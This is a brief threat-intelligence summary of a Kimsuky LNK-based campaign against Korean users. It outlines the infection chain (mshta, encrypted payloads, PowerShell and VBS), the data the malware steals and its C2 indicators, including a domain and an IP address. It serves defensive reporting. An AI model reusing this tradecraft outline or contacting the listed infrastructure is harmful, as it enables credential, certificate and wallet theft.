Logpresso attributes a July 2025 LNK-based intrusion to North Korea-linked Kimsuky, using decoy archives themed around sex offender notification and tax notice documents. The infection chain launches mshta.exe from a disguised shortcut, retrieves encrypted payloads from remote infrastructure, decrypts ZIP content with hardcoded AES material, and runs PowerShell and VBS components from the user profile. The malware collects system information, recent files, browser data, wallet extension artifacts, NPKI/GPKI certificate stores, keylogs, clipboard data, and matching document or wallet-related files before encrypting and chunking uploads to C2. It maintains persistence through a Run registry entry, avoids virtualized environments, polls C2 for upload, download, command execution, and DLL execution tasks, and references infrastructure including mailhubsec.com subdomains and 142.11.248.98. The findings matter because the campaign combines familiar Kimsuky social engineering with credential, certificate, browser, wallet, and file theft capabilities against Korean users.